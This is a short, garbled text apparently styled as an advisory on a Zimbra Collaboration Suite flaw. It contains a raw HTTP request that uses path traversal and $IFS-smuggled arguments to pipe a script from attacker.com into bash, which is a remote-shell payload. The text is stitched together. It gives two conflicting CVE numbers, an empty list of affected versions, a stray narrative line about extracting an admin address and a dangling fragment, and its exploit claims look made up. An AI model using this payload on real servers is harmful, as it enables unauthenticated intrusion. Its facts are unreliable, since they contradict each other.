CVE-2020-7796 Zimbra Collaboration Suite

The following versions of Zimbra Collaboration Suite are vulnerable:

The response lists every admin email hash. She extracts admin@logi-core.local.

Unlike many vulnerabilities that yield limited access (e.g., file read only, or authenticated RCE), CVE-2020-27996 allows an unauthenticated remote attacker to execute arbitrary system commands with the privileges of the Zimbra service user (typically zimbra). This is the equivalent of handing over the keys to the kingdom.

GET /service/extension/UserServlet?ext=com.zimbra.cs.extension.ExtensionUtil&file=../../../../../../../bin/sh&-c$IFScurl$IFSattacker.com/shell.sh|bash HTTP/1.1 Host: victim.zimbra.com file read only

Look for unusual outbound connections or suspicious requests in your Zimbra and proxy logs.

Zimbra Collaboration Suite versions prior to 8.8.15 Patch 7
